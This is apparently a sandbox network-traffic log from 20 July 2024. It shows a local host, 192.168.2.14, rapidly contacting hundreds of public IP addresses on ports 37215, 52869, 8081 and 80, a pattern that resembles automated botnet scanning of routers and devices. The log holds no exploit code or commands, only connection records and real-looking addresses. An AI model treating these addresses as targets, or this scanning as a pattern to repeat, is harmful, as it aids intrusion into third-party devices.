                                                Jul 20, 2024 23:05:33.868670940 CEST3721549430197.135.151.92192.168.2.14
                                                Jul 20, 2024 23:05:33.868680954 CEST372155727492.57.180.103192.168.2.14
                                                Jul 20, 2024 23:05:33.868823051 CEST3721539246158.245.1.223192.168.2.14
                                                Jul 20, 2024 23:05:33.868951082 CEST4630037215192.168.2.14157.14.16.110
                                                Jul 20, 2024 23:05:33.868951082 CEST3955037215192.168.2.14157.83.28.229
                                                Jul 20, 2024 23:05:33.868951082 CEST5949237215192.168.2.14157.208.177.172
                                                Jul 20, 2024 23:05:33.868951082 CEST4608437215192.168.2.14197.50.11.183
                                                Jul 20, 2024 23:05:33.868951082 CEST3585637215192.168.2.14197.219.134.66
                                                Jul 20, 2024 23:05:33.868951082 CEST5378237215192.168.2.14157.176.218.10
                                                Jul 20, 2024 23:05:33.868951082 CEST5361237215192.168.2.1441.165.255.30
                                                Jul 20, 2024 23:05:33.868951082 CEST5658237215192.168.2.14157.14.174.37
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.57.4.227
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.71.67.17
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.32.133.129
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.107.190.151
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.163.84.69
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.91.38.134
                                                Jul 20, 2024 23:05:33.869215965 CEST2747880192.168.2.14112.143.8.180
                                                Jul 20, 2024 23:05:33.869215965 CEST3285037215192.168.2.14157.183.228.205
                                                Jul 20, 2024 23:05:33.869455099 CEST3721547604204.65.167.10192.168.2.14
                                                Jul 20, 2024 23:05:33.869508028 CEST8034522112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:33.869944096 CEST2747880192.168.2.14112.95.4.99
                                                Jul 20, 2024 23:05:33.869944096 CEST2747880192.168.2.14112.69.208.119
                                                Jul 20, 2024 23:05:33.869944096 CEST2747880192.168.2.14112.1.133.120
                                                Jul 20, 2024 23:05:33.869944096 CEST2747880192.168.2.14112.159.120.252
                                                Jul 20, 2024 23:05:33.869944096 CEST3308837215192.168.2.1478.116.111.6
                                                Jul 20, 2024 23:05:33.869944096 CEST2645437215192.168.2.1489.139.16.178
                                                Jul 20, 2024 23:05:33.869944096 CEST2645437215192.168.2.14157.4.55.26
                                                Jul 20, 2024 23:05:33.869944096 CEST5930637215192.168.2.14157.155.124.136
                                                Jul 20, 2024 23:05:33.870250940 CEST3721540396174.135.199.129192.168.2.14
                                                Jul 20, 2024 23:05:33.870258093 CEST3721555596157.248.11.159192.168.2.14
                                                Jul 20, 2024 23:05:33.870373964 CEST3721538480197.148.145.109192.168.2.14
                                                Jul 20, 2024 23:05:33.870449066 CEST3721559306157.155.124.136192.168.2.14
                                                Jul 20, 2024 23:05:33.870524883 CEST2645437215192.168.2.1473.5.2.95
                                                Jul 20, 2024 23:05:33.870524883 CEST2645437215192.168.2.14157.176.87.127
                                                Jul 20, 2024 23:05:33.870524883 CEST2645437215192.168.2.1441.195.108.21
                                                Jul 20, 2024 23:05:33.870526075 CEST2645437215192.168.2.1441.174.84.83
                                                Jul 20, 2024 23:05:33.870526075 CEST2645437215192.168.2.14157.174.219.34
                                                Jul 20, 2024 23:05:33.870526075 CEST2645437215192.168.2.14197.147.25.141
                                                Jul 20, 2024 23:05:33.870526075 CEST2645437215192.168.2.14157.109.177.115
                                                Jul 20, 2024 23:05:33.870526075 CEST5454237215192.168.2.1441.103.45.78
                                                Jul 20, 2024 23:05:33.870593071 CEST3721554782110.124.171.180192.168.2.14
                                                Jul 20, 2024 23:05:33.870634079 CEST5286953970181.62.64.51192.168.2.14
                                                Jul 20, 2024 23:05:33.870637894 CEST3721559976121.209.116.212192.168.2.14
                                                Jul 20, 2024 23:05:33.870657921 CEST4387837215192.168.2.14197.52.105.112
                                                Jul 20, 2024 23:05:33.870657921 CEST4357437215192.168.2.14157.42.169.126
                                                Jul 20, 2024 23:05:33.870657921 CEST4484637215192.168.2.14197.206.89.130
                                                Jul 20, 2024 23:05:33.870657921 CEST5699037215192.168.2.14197.153.130.241
                                                Jul 20, 2024 23:05:33.870657921 CEST2645437215192.168.2.14197.254.28.3
                                                Jul 20, 2024 23:05:33.870657921 CEST2645437215192.168.2.14157.90.137.50
                                                Jul 20, 2024 23:05:33.870657921 CEST2645437215192.168.2.1441.79.252.30
                                                Jul 20, 2024 23:05:33.870657921 CEST2645437215192.168.2.14197.243.105.139
                                                Jul 20, 2024 23:05:33.870660067 CEST3721552494216.204.37.61192.168.2.14
                                                Jul 20, 2024 23:05:33.870698929 CEST5397052869192.168.2.14181.62.64.51
                                                Jul 20, 2024 23:05:33.871043921 CEST372155636441.135.32.84192.168.2.14
                                                Jul 20, 2024 23:05:33.871047974 CEST3721554158197.237.152.228192.168.2.14
                                                Jul 20, 2024 23:05:33.871052980 CEST3721560218197.207.102.189192.168.2.14
                                                Jul 20, 2024 23:05:33.871057034 CEST3721556228157.68.215.138192.168.2.14
                                                Jul 20, 2024 23:05:33.871066093 CEST3721534140157.25.209.247192.168.2.14
                                                Jul 20, 2024 23:05:33.871071100 CEST4364437215192.168.2.14197.170.178.75
                                                Jul 20, 2024 23:05:33.871917963 CEST4332037215192.168.2.14197.220.34.254
                                                Jul 20, 2024 23:05:33.871917963 CEST4189237215192.168.2.14125.218.223.230
                                                Jul 20, 2024 23:05:33.871917963 CEST4619037215192.168.2.14157.221.39.140
                                                Jul 20, 2024 23:05:33.871917963 CEST5482237215192.168.2.14157.180.0.116
                                                Jul 20, 2024 23:05:33.871917963 CEST5817437215192.168.2.14138.194.165.219
                                                Jul 20, 2024 23:05:33.871917963 CEST3313237215192.168.2.14157.124.133.127
                                                Jul 20, 2024 23:05:33.871917963 CEST5752237215192.168.2.14197.125.116.0
                                                Jul 20, 2024 23:05:33.871917963 CEST3939637215192.168.2.1441.248.125.74
                                                Jul 20, 2024 23:05:33.871999025 CEST5997637215192.168.2.14121.209.116.212
                                                Jul 20, 2024 23:05:33.871999025 CEST5559637215192.168.2.14157.248.11.159
                                                Jul 20, 2024 23:05:33.871999025 CEST3848037215192.168.2.14197.148.145.109
                                                Jul 20, 2024 23:05:33.871999979 CEST3924637215192.168.2.14158.245.1.223
                                                Jul 20, 2024 23:05:33.871999979 CEST4147237215192.168.2.14197.237.160.210
                                                Jul 20, 2024 23:05:33.871999979 CEST4376437215192.168.2.1441.46.124.193
                                                Jul 20, 2024 23:05:33.871999979 CEST5732237215192.168.2.14176.171.193.242
                                                Jul 20, 2024 23:05:33.871999979 CEST3364037215192.168.2.14197.223.52.137
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14197.115.173.78
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14157.162.165.169
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14157.2.85.178
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14197.116.9.21
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14197.108.108.0
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14197.108.134.220
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.14197.156.139.236
                                                Jul 20, 2024 23:05:33.872375965 CEST2645437215192.168.2.1441.133.58.113
                                                Jul 20, 2024 23:05:33.872457981 CEST372155524241.189.66.95192.168.2.14
                                                Jul 20, 2024 23:05:33.872522116 CEST3721536174157.58.89.166192.168.2.14
                                                Jul 20, 2024 23:05:33.872544050 CEST372154642841.70.140.218192.168.2.14
                                                Jul 20, 2024 23:05:33.872560024 CEST3721550818157.182.246.174192.168.2.14
                                                Jul 20, 2024 23:05:33.872575045 CEST372154596041.133.29.67192.168.2.14
                                                Jul 20, 2024 23:05:33.872587919 CEST3721553906197.187.231.237192.168.2.14
                                                Jul 20, 2024 23:05:33.872698069 CEST8034522112.252.3.32192.168.2.14
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14119.169.56.81
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14157.4.156.172
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14197.202.193.240
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14197.183.119.214
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14197.31.76.185
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14157.99.2.135
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14110.236.152.167
                                                Jul 20, 2024 23:05:33.872937918 CEST2645437215192.168.2.14157.196.81.135
                                                Jul 20, 2024 23:05:33.872952938 CEST5504637215192.168.2.1424.82.183.93
                                                Jul 20, 2024 23:05:33.872952938 CEST4932037215192.168.2.1491.98.242.170
                                                Jul 20, 2024 23:05:33.872952938 CEST4936237215192.168.2.14185.101.34.75
                                                Jul 20, 2024 23:05:33.872952938 CEST5249437215192.168.2.14216.204.37.61
                                                Jul 20, 2024 23:05:33.872952938 CEST5524637215192.168.2.14197.23.105.2
                                                Jul 20, 2024 23:05:33.872952938 CEST3776637215192.168.2.14141.199.59.173
                                                Jul 20, 2024 23:05:33.872952938 CEST5727437215192.168.2.1492.57.180.103
                                                Jul 20, 2024 23:05:33.872952938 CEST4655637215192.168.2.14152.41.190.171
                                                Jul 20, 2024 23:05:33.872982025 CEST4530037215192.168.2.14157.204.130.3
                                                Jul 20, 2024 23:05:33.872982025 CEST3458637215192.168.2.14155.178.232.143
                                                Jul 20, 2024 23:05:33.872982025 CEST4467037215192.168.2.14128.4.57.232
                                                Jul 20, 2024 23:05:33.872982025 CEST4185837215192.168.2.1441.247.46.12
                                                Jul 20, 2024 23:05:33.872982025 CEST5995037215192.168.2.14157.33.158.151
                                                Jul 20, 2024 23:05:33.872982025 CEST4873837215192.168.2.14197.38.240.133
                                                Jul 20, 2024 23:05:33.872982025 CEST4316437215192.168.2.1441.93.186.26
                                                Jul 20, 2024 23:05:33.872982025 CEST5625237215192.168.2.14120.191.233.247
                                                Jul 20, 2024 23:05:33.873418093 CEST3721540396174.135.199.129192.168.2.14
                                                Jul 20, 2024 23:05:33.873456955 CEST3721547604204.65.167.10192.168.2.14
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.14157.30.84.151
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.14204.194.149.129
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.1441.230.129.55
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.14197.45.7.74
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.1441.180.171.74
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.14157.0.163.42
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.14157.142.3.127
                                                Jul 20, 2024 23:05:33.873514891 CEST2645437215192.168.2.14138.48.213.187
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.14197.229.136.81
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.14162.205.161.113
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.14197.190.214.133
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.14206.117.1.48
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.14137.215.5.159
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.1472.136.138.114
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.14185.10.101.51
                                                Jul 20, 2024 23:05:33.873529911 CEST2645437215192.168.2.1441.251.1.148
                                                Jul 20, 2024 23:05:33.873734951 CEST3474052869192.168.2.14116.132.89.76
                                                Jul 20, 2024 23:05:33.874020100 CEST5355037215192.168.2.14157.198.219.2
                                                Jul 20, 2024 23:05:33.874020100 CEST4938037215192.168.2.1441.185.62.167
                                                Jul 20, 2024 23:05:33.874020100 CEST4267637215192.168.2.1441.156.206.214
                                                Jul 20, 2024 23:05:33.874020100 CEST5191037215192.168.2.14197.57.175.45
                                                Jul 20, 2024 23:05:33.874020100 CEST2645437215192.168.2.14157.213.58.7
                                                Jul 20, 2024 23:05:33.874020100 CEST2645437215192.168.2.14157.234.25.50
                                                Jul 20, 2024 23:05:33.874020100 CEST2645437215192.168.2.14185.42.8.255
                                                Jul 20, 2024 23:05:33.874020100 CEST2645437215192.168.2.14134.212.45.105
                                                Jul 20, 2024 23:05:33.874089956 CEST3721549430197.135.151.92192.168.2.14
                                                Jul 20, 2024 23:05:33.874109030 CEST372155817641.212.142.21192.168.2.14
                                                Jul 20, 2024 23:05:33.874151945 CEST3721546300157.14.16.110192.168.2.14
                                                Jul 20, 2024 23:05:33.874200106 CEST3721539550157.83.28.229192.168.2.14
                                                Jul 20, 2024 23:05:33.874216080 CEST3721559492157.208.177.172192.168.2.14
                                                Jul 20, 2024 23:05:33.874319077 CEST3721546084197.50.11.183192.168.2.14
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.1441.233.84.140
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.14168.182.189.201
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.14157.179.101.190
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.1441.100.175.8
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.14217.103.236.34
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.1441.242.229.134
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.1491.80.62.224
                                                Jul 20, 2024 23:05:33.874455929 CEST2645437215192.168.2.14197.251.223.39
                                                Jul 20, 2024 23:05:33.874633074 CEST3721535856197.219.134.66192.168.2.14
                                                Jul 20, 2024 23:05:33.874697924 CEST2645437215192.168.2.14197.50.64.46
                                                Jul 20, 2024 23:05:33.874697924 CEST2645437215192.168.2.145.42.213.194
                                                Jul 20, 2024 23:05:33.874697924 CEST2645437215192.168.2.1441.232.104.26
                                                Jul 20, 2024 23:05:33.874697924 CEST2645437215192.168.2.14157.120.209.251
                                                Jul 20, 2024 23:05:33.874697924 CEST345908081192.168.2.14141.238.111.1
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.1476.26.254.66
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.14157.76.104.142
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.14173.98.49.193
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.1466.181.68.243
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.1441.55.75.252
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.14197.186.114.109
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.1492.89.33.110
                                                Jul 20, 2024 23:05:33.875025034 CEST2645437215192.168.2.1447.254.70.130
                                                Jul 20, 2024 23:05:33.875036001 CEST8046340112.127.110.129192.168.2.14
                                                Jul 20, 2024 23:05:33.875051975 CEST3721553782157.176.218.10192.168.2.14
                                                Jul 20, 2024 23:05:33.875125885 CEST4634080192.168.2.14112.127.110.129
                                                Jul 20, 2024 23:05:33.875257969 CEST372155361241.165.255.30192.168.2.14
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.1469.88.211.111
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.1441.108.126.86
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.14197.253.219.184
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.1441.150.34.91
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.14197.173.22.144
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.14197.54.31.118
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.1441.53.13.101
                                                Jul 20, 2024 23:05:33.875495911 CEST2645437215192.168.2.14197.181.45.194
                                                Jul 20, 2024 23:05:33.875499010 CEST3721556582157.14.174.37192.168.2.14
                                                Jul 20, 2024 23:05:33.875946045 CEST5476237215192.168.2.14197.94.74.21
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.14157.213.41.238
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.14157.21.35.111
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.1460.83.70.35
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.14197.52.17.136
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.1484.122.190.124
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.1441.221.23.140
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.14186.59.39.214
                                                Jul 20, 2024 23:05:33.875997066 CEST2645437215192.168.2.1441.2.109.125
                                                Jul 20, 2024 23:05:33.876351118 CEST3721543644197.170.178.75192.168.2.14
                                                Jul 20, 2024 23:05:33.876403093 CEST4364437215192.168.2.14197.170.178.75
                                                Jul 20, 2024 23:05:33.876408100 CEST2645437215192.168.2.14157.176.199.90
                                                Jul 20, 2024 23:05:33.876408100 CEST2645437215192.168.2.14157.20.6.246
                                                Jul 20, 2024 23:05:33.876408100 CEST2645437215192.168.2.14157.86.188.82
                                                Jul 20, 2024 23:05:33.876408100 CEST2645437215192.168.2.1441.220.191.106
                                                Jul 20, 2024 23:05:33.876408100 CEST2645437215192.168.2.14197.91.51.154
                                                Jul 20, 2024 23:05:33.876408100 CEST2645437215192.168.2.14197.241.36.115
                                                Jul 20, 2024 23:05:33.876408100 CEST5298280192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.1441.31.169.225
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.14189.104.100.149
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.1441.254.181.251
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.14157.229.179.252
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.14147.101.156.20
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.14157.161.143.70
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.1441.167.37.164
                                                Jul 20, 2024 23:05:33.876926899 CEST2645437215192.168.2.1441.98.51.125
                                                Jul 20, 2024 23:05:33.876996994 CEST3721543878197.52.105.112192.168.2.14
                                                Jul 20, 2024 23:05:33.877038956 CEST3721559306157.155.124.136192.168.2.14
                                                Jul 20, 2024 23:05:33.877048969 CEST3721543574157.42.169.126192.168.2.14
                                                Jul 20, 2024 23:05:33.877057076 CEST3721532850157.183.228.205192.168.2.14
                                                Jul 20, 2024 23:05:33.877068043 CEST3721544846197.206.89.130192.168.2.14
                                                Jul 20, 2024 23:05:33.877089977 CEST372155454241.103.45.78192.168.2.14
                                                Jul 20, 2024 23:05:33.877099037 CEST3721543320197.220.34.254192.168.2.14
                                                Jul 20, 2024 23:05:33.877114058 CEST3721556990197.153.130.241192.168.2.14
                                                Jul 20, 2024 23:05:33.877121925 CEST3721541892125.218.223.230192.168.2.14
                                                Jul 20, 2024 23:05:33.877188921 CEST3721559976121.209.116.212192.168.2.14
                                                Jul 20, 2024 23:05:33.877197981 CEST3721555596157.248.11.159192.168.2.14
                                                Jul 20, 2024 23:05:33.877206087 CEST3721546190157.221.39.140192.168.2.14
                                                Jul 20, 2024 23:05:33.877247095 CEST3721538480197.148.145.109192.168.2.14
                                                Jul 20, 2024 23:05:33.877319098 CEST2645437215192.168.2.14176.212.27.166
                                                Jul 20, 2024 23:05:33.877319098 CEST2645437215192.168.2.14157.251.98.163
                                                Jul 20, 2024 23:05:33.877319098 CEST2645437215192.168.2.14197.59.156.63
                                                Jul 20, 2024 23:05:33.877319098 CEST2645437215192.168.2.14157.177.25.91
                                                Jul 20, 2024 23:05:33.877319098 CEST416388081192.168.2.1481.72.49.108
                                                Jul 20, 2024 23:05:33.877877951 CEST3721554822157.180.0.116192.168.2.14
                                                Jul 20, 2024 23:05:33.877888918 CEST3721539246158.245.1.223192.168.2.14
                                                Jul 20, 2024 23:05:33.877897978 CEST3721558174138.194.165.219192.168.2.14
                                                Jul 20, 2024 23:05:33.877907991 CEST3721533132157.124.133.127192.168.2.14
                                                Jul 20, 2024 23:05:33.877917051 CEST3721541472197.237.160.210192.168.2.14
                                                Jul 20, 2024 23:05:33.877933979 CEST3721557522197.125.116.0192.168.2.14
                                                Jul 20, 2024 23:05:33.877944946 CEST372154376441.46.124.193192.168.2.14
                                                Jul 20, 2024 23:05:33.877954006 CEST3721557322176.171.193.242192.168.2.14
                                                Jul 20, 2024 23:05:33.877974987 CEST372153939641.248.125.74192.168.2.14
                                                Jul 20, 2024 23:05:33.877984047 CEST3721533640197.223.52.137192.168.2.14
                                                Jul 20, 2024 23:05:33.877991915 CEST372155504624.82.183.93192.168.2.14
                                                Jul 20, 2024 23:05:33.878051996 CEST3721545300157.204.130.3192.168.2.14
                                                Jul 20, 2024 23:05:33.878060102 CEST372154932091.98.242.170192.168.2.14
                                                Jul 20, 2024 23:05:33.878068924 CEST3721534586155.178.232.143192.168.2.14
                                                Jul 20, 2024 23:05:33.878077030 CEST3721549362185.101.34.75192.168.2.14
                                                Jul 20, 2024 23:05:33.878084898 CEST3721544670128.4.57.232192.168.2.14
                                                Jul 20, 2024 23:05:33.878168106 CEST3721552494216.204.37.61192.168.2.14
                                                Jul 20, 2024 23:05:33.878176928 CEST3721555246197.23.105.2192.168.2.14
                                                Jul 20, 2024 23:05:33.878185034 CEST3721537766141.199.59.173192.168.2.14
                                                Jul 20, 2024 23:05:33.878194094 CEST372155727492.57.180.103192.168.2.14
                                                Jul 20, 2024 23:05:33.878431082 CEST4835252869192.168.2.14183.106.204.162
                                                Jul 20, 2024 23:05:33.878963947 CEST3721546556152.41.190.171192.168.2.14
                                                Jul 20, 2024 23:05:33.878973961 CEST372154185841.247.46.12192.168.2.14
                                                Jul 20, 2024 23:05:33.878982067 CEST3721559950157.33.158.151192.168.2.14
                                                Jul 20, 2024 23:05:33.878990889 CEST3721548738197.38.240.133192.168.2.14
                                                Jul 20, 2024 23:05:33.878998995 CEST5286934740116.132.89.76192.168.2.14
                                                Jul 20, 2024 23:05:33.879005909 CEST372154316441.93.186.26192.168.2.14
                                                Jul 20, 2024 23:05:33.879013062 CEST3721556252120.191.233.247192.168.2.14
                                                Jul 20, 2024 23:05:33.879054070 CEST3474052869192.168.2.14116.132.89.76
                                                Jul 20, 2024 23:05:33.879385948 CEST5272880192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:33.879388094 CEST3721553550157.198.219.2192.168.2.14
                                                Jul 20, 2024 23:05:33.879396915 CEST372154938041.185.62.167192.168.2.14
                                                Jul 20, 2024 23:05:33.879404068 CEST372154267641.156.206.214192.168.2.14
                                                Jul 20, 2024 23:05:33.879420042 CEST3721551910197.57.175.45192.168.2.14
                                                Jul 20, 2024 23:05:33.879848003 CEST603188081192.168.2.1457.96.182.14
                                                Jul 20, 2024 23:05:33.881295919 CEST3721545738197.48.133.159192.168.2.14
                                                Jul 20, 2024 23:05:33.881323099 CEST3721536374197.48.219.131192.168.2.14
                                                Jul 20, 2024 23:05:33.881331921 CEST3721553444131.78.104.9192.168.2.14
                                                Jul 20, 2024 23:05:33.881397009 CEST3721549388157.196.44.133192.168.2.14
                                                Jul 20, 2024 23:05:33.881403923 CEST3721550094157.104.80.16192.168.2.14
                                                Jul 20, 2024 23:05:33.881411076 CEST3721536520197.157.247.234192.168.2.14
                                                Jul 20, 2024 23:05:33.881417036 CEST3721540202157.157.49.65192.168.2.14
                                                Jul 20, 2024 23:05:33.881432056 CEST372154209241.209.69.235192.168.2.14
                                                Jul 20, 2024 23:05:33.881438017 CEST3721536214197.40.168.196192.168.2.14
                                                Jul 20, 2024 23:05:33.881444931 CEST3721544722157.96.246.174192.168.2.14
                                                Jul 20, 2024 23:05:33.881452084 CEST3721542050157.62.62.113192.168.2.14
                                                Jul 20, 2024 23:05:33.881458998 CEST3721544230157.18.39.4192.168.2.14
                                                Jul 20, 2024 23:05:33.881464958 CEST3721551272157.194.67.142192.168.2.14
                                                Jul 20, 2024 23:05:33.881473064 CEST3721540008133.28.220.100192.168.2.14
                                                Jul 20, 2024 23:05:33.881479979 CEST3721549252157.148.29.80192.168.2.14
                                                Jul 20, 2024 23:05:33.881485939 CEST3721549870181.89.181.103192.168.2.14
                                                Jul 20, 2024 23:05:33.881493092 CEST372153280494.44.111.34192.168.2.14
                                                Jul 20, 2024 23:05:33.881500006 CEST3721547806157.183.5.146192.168.2.14
                                                Jul 20, 2024 23:05:33.881506920 CEST3721550092157.244.153.74192.168.2.14
                                                Jul 20, 2024 23:05:33.881514072 CEST3721535948157.153.42.4192.168.2.14
                                                Jul 20, 2024 23:05:33.881520987 CEST3721554612197.152.207.21192.168.2.14
                                                Jul 20, 2024 23:05:33.881526947 CEST3721547294186.23.77.122192.168.2.14
                                                Jul 20, 2024 23:05:33.881541014 CEST3721545392157.233.53.190192.168.2.14
                                                Jul 20, 2024 23:05:33.881553888 CEST372155536631.226.75.152192.168.2.14
                                                Jul 20, 2024 23:05:33.881561995 CEST3721543638197.164.78.122192.168.2.14
                                                Jul 20, 2024 23:05:33.881568909 CEST3721548590157.183.110.42192.168.2.14
                                                Jul 20, 2024 23:05:33.881577969 CEST3721542340197.112.26.200192.168.2.14
                                                Jul 20, 2024 23:05:33.881586075 CEST808134590141.238.111.1192.168.2.14
                                                Jul 20, 2024 23:05:33.881650925 CEST345908081192.168.2.14141.238.111.1
                                                Jul 20, 2024 23:05:33.881731987 CEST4494237215192.168.2.14180.149.134.73
                                                Jul 20, 2024 23:05:33.881907940 CEST3721554762197.94.74.21192.168.2.14
                                                Jul 20, 2024 23:05:33.881951094 CEST5476237215192.168.2.14197.94.74.21
                                                Jul 20, 2024 23:05:33.883166075 CEST8052982112.134.182.255192.168.2.14
                                                Jul 20, 2024 23:05:33.883224010 CEST5298280192.168.2.14112.134.182.255
                                                Jul 20, 2024 23:05:33.883661032 CEST80814163881.72.49.108192.168.2.14
                                                Jul 20, 2024 23:05:33.883757114 CEST416388081192.168.2.1481.72.49.108
                                                Jul 20, 2024 23:05:33.883980989 CEST5286948352183.106.204.162192.168.2.14
                                                Jul 20, 2024 23:05:33.884058952 CEST4835252869192.168.2.14183.106.204.162
                                                Jul 20, 2024 23:05:33.884257078 CEST803356895.101.7.150192.168.2.14
                                                Jul 20, 2024 23:05:33.884309053 CEST3356880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:33.884388924 CEST4493852869192.168.2.14120.181.185.117
                                                Jul 20, 2024 23:05:33.885406971 CEST5690080192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:33.885615110 CEST8052728112.165.112.253192.168.2.14
                                                Jul 20, 2024 23:05:33.885674953 CEST5272880192.168.2.14112.165.112.253
                                                Jul 20, 2024 23:05:33.885792971 CEST364088081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:33.885797024 CEST80816031857.96.182.14192.168.2.14
                                                Jul 20, 2024 23:05:33.885876894 CEST603188081192.168.2.1457.96.182.14
                                                Jul 20, 2024 23:05:33.886217117 CEST3854837215192.168.2.1441.145.104.135
                                                Jul 20, 2024 23:05:33.887557983 CEST3721544942180.149.134.73192.168.2.14
                                                Jul 20, 2024 23:05:33.887626886 CEST4494237215192.168.2.14180.149.134.73
                                                Jul 20, 2024 23:05:33.888413906 CEST6099452869192.168.2.1451.84.22.246
                                                Jul 20, 2024 23:05:33.889256954 CEST372154349441.146.165.184192.168.2.14
                                                Jul 20, 2024 23:05:33.889317989 CEST372155609241.248.234.133192.168.2.14
                                                Jul 20, 2024 23:05:33.889323950 CEST3721556116157.184.79.183192.168.2.14
                                                Jul 20, 2024 23:05:33.889328003 CEST3721546850157.22.107.208192.168.2.14
                                                Jul 20, 2024 23:05:33.889333010 CEST3721537594197.209.199.16192.168.2.14
                                                Jul 20, 2024 23:05:33.889487982 CEST3721557716197.164.23.3192.168.2.14
                                                Jul 20, 2024 23:05:33.890613079 CEST496148081192.168.2.14190.19.12.161
                                                Jul 20, 2024 23:05:33.890685081 CEST5286944938120.181.185.117192.168.2.14
                                                Jul 20, 2024 23:05:33.890750885 CEST4493852869192.168.2.14120.181.185.117
                                                Jul 20, 2024 23:05:33.891479015 CEST4183080192.168.2.14112.210.253.203
                                                Jul 20, 2024 23:05:33.891485929 CEST8056900112.236.220.141192.168.2.14
                                                Jul 20, 2024 23:05:33.891554117 CEST5690080192.168.2.14112.236.220.141
                                                Jul 20, 2024 23:05:33.891843081 CEST808136408139.69.41.174192.168.2.14
                                                Jul 20, 2024 23:05:33.891904116 CEST364088081192.168.2.14139.69.41.174
                                                Jul 20, 2024 23:05:33.892160892 CEST4809437215192.168.2.14157.153.180.139
                                                Jul 20, 2024 23:05:33.892359972 CEST372153854841.145.104.135192.168.2.14
                                                Jul 20, 2024 23:05:33.892508030 CEST3854837215192.168.2.1441.145.104.135
                                                Jul 20, 2024 23:05:33.894630909 CEST5397252869192.168.2.14183.59.191.208
                                                Jul 20, 2024 23:05:33.895865917 CEST528696099451.84.22.246192.168.2.14
                                                Jul 20, 2024 23:05:33.895972013 CEST6099452869192.168.2.1451.84.22.246
                                                Jul 20, 2024 23:05:33.896416903 CEST808149614190.19.12.161192.168.2.14
